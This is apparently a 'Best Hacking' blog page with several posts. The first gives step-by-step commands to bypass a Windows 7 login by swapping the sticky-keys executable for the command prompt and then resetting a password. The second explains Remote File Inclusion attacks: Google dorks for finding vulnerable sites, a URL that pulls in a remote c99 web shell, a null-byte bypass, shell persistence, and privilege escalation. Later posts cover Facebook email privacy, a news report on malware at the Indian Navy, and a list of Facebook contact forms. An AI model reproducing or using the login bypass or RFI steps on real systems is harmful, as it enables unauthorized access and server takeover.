Hack Windows 7 Password the Easy Way ~ Best Hacking

Posted by ραятн ραтєℓ




Boot off the Windows disk and select the “Repair your computer” option from the lower left-hand corner.

Follow through until you get to the option to open the Command Prompt, which you’ll want to select.

First you’ll want to type in the following command to backup the original sticky keys file:
copy c:\windows\system32\sethc.exe c:\
Then you’ll copy the command prompt executable (cmd.exe) over top of the sticky keys executable:
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

Now you can reboot the PC.

Resetting the Password

Once you get to the login screen, hit the Shift key 5 times, and you’ll see an administrator mode command prompt.



Now to reset the password—just type the following command, replacing the username and password with the combination you want:
net user yourusername MyNewPassword

That’s all there is to it. Now you can login.



Dont Forgot to leave a comment if you like the post 

Web Hacking ~ Remote File Inclusion

Posted by ραятн ραтєℓ


       Remote File Inclusion (RFI) occurs when a remote file, usually a shell 
(a graphical interface for browsing remote files and running your own code 
on a server), is included into a website which allows the hacker to execute 
server side commands as the current logged on user, and have access to 
files on the server. With this power the hacker can continue on to use local 
exploits to escalate his privileges and take over the whole system.  

   
                                                                                                                                                                               Many servers are vulnerable to this kind of attack because of PHP’s 
default settings of register_globals and allow_url_fopen being enabled. 
Although as of PHP 6.0, register_globals has been depreciated and 
removed, many websites still rely on older versions of PHP to run their web applications. Now let’s go through the steps a hacker would take to exploit 
this type of vulnerability in a website..



1.  First the hacker would find a website that gets its pages via the 
     PHP include() function and is vulnerable to RFI. Many hackers us
     Google dorks to locate servers vulnerable to RFI. A Google dork i
     the act of using Google’s provided search tools to help get a 
     specific search result.

2.  Website that include pages have a navigation system similar to: 
               http://target-site.com/index.php?page=PageName 


3.  To see if a the page is vulnerable, the hacker would try to include
      a site instead of PageName like the following: 
      http://target-site.com/index.php?page=http://google.com  


4.  If the Google homepage shows up on the website, then the 
      hacker knows the website is vulnerable and would continue to 
       include a shell. 



5.  A couple of the most popular shells are c99 and r57. A hacker 
      would either upload them to a remote server or just use a Google 
      dork to locate them already online and insert them. To find the a 
      shell the hacker would search Google for: inurl:c99.txt. This will 
      display many websites with the shell already up and ready to be 
     included. At the end of the URL make sure to add a ? so that if 
     anything comes after c99.txt, it will be passed to the shell and not 
     cause any problems. The new URL with the shell included would 
     look like: 

            http://target-site.com/index.php?page=http://site.com/c99.txt? 

6.  Sometimes the PHP script on the server appends “.php” to the 
      end of every included file. So if you included the shell, it would 
      end up looking like “c99.txt.php” and not work. To get around 
      this, you would add a null byte () to the end of c99.txt. This 
      tells the server to ignore everything after c99.txt. 


7.  In step one, I told you that hackers use Google dorks to look for 
     sites possibly vulnerable to RFIs. An example of a Google dork would be:                                                      allinurl:.php?page=. This looks for URL’s with 
   .php?page= in them. This is only an example and you most likely 
    won’t find any vulnerable sites with that search. You can try 
   switching around the word “page” with other letters and similar  
   words. Hackers usually search vulnerability databases like 
   www.milw0rm.com for already discovered RFI vulnerabilities in 
   site content management systems and search for websites that 
   are running that vulnerable web application with a Google dork.



8.  If the hacker succeeds in getting the server to parse the shell, he 
      will be presented with a screen similar to the following: 
The shell will display information about the remote server and list all 
the files and directories on it. From here the hacker would find a 
directory that has read and write privileges and upload the shell but this time as a .php file so that incase the vulnerability is fixed, he will 
be able to access it later on. 

9.  The hacker would next find a way to gain root privileges on the 
    system. He can do this by uploading and running local exploits 
    against the server. He could also search the victim server for 
    configuration files. These files may contain username and 
     passwords for the MYSQL databases and such. 

To protect yourself from RFI attacks, simply make sure you are using up-to-date 
scripts, and make sure you server php.ini file has register_globals and 
allow_url_fopen disabled. 




Dont Forgot to leave a comment if you like the post 

What you need to know about Facebook sneakily swapping users' default email addresses to @facebook.com

Posted by ραятн ραтєℓ


Have you checked the contact information you list on your Facebook profile?
Chances are that it's now listing an @facebook.com email contact address for you.
Facebook email address on user's profile
You can thank Facebook for making that change without telling you.
Back in April, Facebook quietly announced that it would be giving users @facebook.com email addresses so that they matched their public username (used as the URL for users' profile pages).
Facebook addresses matching Timeline address
However, the social network didn't make clear that it would also be making the @facebook.com email addresses the default address displayed to your online friends.
Clearly this all part of the site's plan to get more people using the @facebook.com email addresses, thus making the social network even harder to extricate yourself from.
If you don't want your @facebook.com email address to be displayed on your profile, you should change your settings.
  • Click on the "About" tab on your profile
  • Go to the section marked "Contact info" and choose "Edit"
Facebook contact info
  • Adjust the settings to choose which - if any - of your email addresses (including the new @facebook.com email address that you have been given) you would like to appear on your timeline, and who has the rights to see it. (You might also want to ask yourself whether if someone isreally your friend, wouldn't they already know your email address without having to look it up on Facebook?)

  • Press "Save" and you're all done.
Of course, you shouldn't be fooled into thinking that hiding your @facebook.com email address makes it impossible for someone to work out what it is. After all, it now matches the public username in your profile's URL.

According to Facebook, by default anybody on the site can send you a message, and anyone on the internet can email you at your new "username@facebook.com" address.

As we described extensively in our examination of the Facebook messaging system, the @facebook.com email addresses are likely to prove attractive targets for spammers hawking goods and malicious links.

If you don't like such a wide variety of people being able to send you messages, you will need to change your settings.

  • Click the account menu at the top right of any Facebook page and choose "Privacy Settings".
  • Next to the "How You Connect" heading, click "Edit Settings".
  • Select your preference from the dropdown menu next to "Who can send you Facebook messages?". Remember that "Everyone" means not just everyone on Facebook, but everyone on the entire internet

Facebook will have to implement effective filtering mechanisms to prevent fraudsters from exploiting users with spam, scams and phishing attacks as a result of this opening up of the network's messaging system.

My guess is that it won't be long at all before we see criminals abusing @facebook.com email addresses for their own nefarious reasons.

Indian Navy investigates cyber attack on military PCs

Posted by ραятн ραтєℓ


Computer security, artwork
It is often hard to know where hackers are based,
even if IP addresses are traced to a certain country 


The Indian Navy is investigating a suspected hack attack.
A spokesman confirmed to the BBC that computers at its Eastern Naval Command had been infected with malware.
The announcement follows a report in The Indian Express saying that a virus had collected data from computers not linked to the internet and had sent it to IP addresses in China.
But security firm Sophos said it did not necessarily mean the hackers were based in China.
The Chinese Embassy in the UK did not provide comment.
The Eastern Naval Command has a security role on India's eastern borders, including protection of strategic and commercial assets.

Start Quote

Finding the 'smoking gun' evidence of who was behind a particular internet attack is often very hard to find”
Graham CluleySophos
'Covering tracks'
It is reported that the information might have been collected via infected USB drives.
The malware is then thought to have created a secret folder on the drives where it stored documents, and as soon as the drive was plugged into a computer connected to the web, it sent the files to specific IP addresses.
Although those IP addresses were reportedly traced to China, an analyst from security firm Sophos warned against reading too much into the detail.
"Even if a hack is traced back to a Chinese IP address, it doesn't necessarily mean that Chinese hackers are behind the hack," Graham Cluley, senior technology consultant, told the BBC.
"It's very hard to prove who is behind an attack because hackers can hijack computers on the other side of the world and get them to do their dirty work for them. In fact, they often do this to cover their tracks.
"Finding the 'smoking gun' evidence of who was behind a particular internet attack is, for this reason, often very hard to find."

How to all Time Contact With Facebook ?

Posted by ραятн ραтєℓ

How To Contact Facebook



Mobile

Photos

Video

Pages

Groups

Errors

Contacts

Ads

Inbox

News Feeds

Home Page

Wall

Notifications

Disabled Account

Lost Content After Reactivated Account

Chat

Suggestions

Hacked

Scam

Death

Illegal

Minors

Copyright Infringement

(These links are correct at the time of publication)  
If you have found another Facebook contact form that I have missed.. please leave a comment below.

By- hackwithstyle

Dont Forgot to leave a comment if you like the post